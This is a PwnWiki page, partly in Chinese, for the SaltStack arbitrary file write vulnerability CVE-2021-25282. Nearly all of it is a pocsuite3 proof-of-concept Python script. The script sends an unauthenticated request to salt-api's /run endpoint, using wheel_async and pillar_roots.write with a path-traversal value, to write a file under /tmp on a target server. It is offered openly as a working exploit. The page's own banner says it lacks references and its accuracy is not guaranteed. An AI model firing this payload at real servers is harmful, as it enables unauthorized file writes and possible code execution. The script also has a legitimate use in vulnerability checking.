Saltstack 任意文件寫入漏洞(CVE-2021-25282)

From PwnWiki
Revision as of 21:44, 2 March 2021 by Pwnwiki (talk | contribs) (建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。


POC

  1. !/usr/bin/env python
  2. coding: utf-8

from urllib.parse import urlparse from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase from pocsuite3.api import POC_CATEGORY, VUL_TYPE import re import json


class TestPOC(POCBase): 

   vulID = '000'
   version = '1'
   author = 'zhzyker'
   vulDate = '2021-02-27'
   createDate = '2021-03-02'
   updateDate = '2021-03-02'
   references = ['https://github.com/zhzyker/vulmap']
   name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
   appName = 'SaltStack'
   appVersion = '< 3002.5'
   vulType = VUL_TYPE.CODE_EXECUTION
   category = POC_CATEGORY.EXPLOITS.REMOTE
   desc = 
       Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
   



   def _verify(self):
       result = {}
       pr = urlparse(self.url)
       if pr.port:
           ports = [pr.port]
       else:
           ports = [8000]
       for port in ports:
           target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
           TIMEOUT = 10
           
           url = target + "/run"
           path = "../../../../../../../../../tmp/vuln"
           headers = {
               'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
               'Content-Type': 'application/json'
               }
           data = {
               'eauth': 'auto',
               'client': 'wheel_async',
               'fun': 'pillar_roots.write',
               'data': 'vuln_cve_2021_25282',
               'path': path
           }
           
           data = json.dumps(data)
           try:
               r = req.post(url, headers=headers, data=data, timeout=TIMEOUT, verify=False)
               # print(r.text)
               tag = list(json.loads(r.text)["return"])[0]["tag"]
               jid = list(json.loads(r.text)["return"])[0]["jid"]
               if r"salt/wheel" in tag:
                   if jid in tag:
                       result['VerifyInfo'] = {}
                       result['VerifyInfo']['URL'] = url
                       result['VerifyInfo']['JID'] = jid
                       result['VerifyInfo']['UPLOAD'] = path
                       break
           except:
               pass
       return self.parse_output(result)

   def _attack(self):
       return self._verify()

   def parse_output(self, result):
       output = Output(self)
       if result:
           output.success(result)
       else:
           output.fail('not vulnerability')
       return output

register_poc(TestPOC)


版權信息

POC由【之乎者也】提供。

Retrieved from "https://pwnwiki.com/index.php?title=Saltstack_任意文件寫入漏洞(CVE-2021-25282)&oldid=130"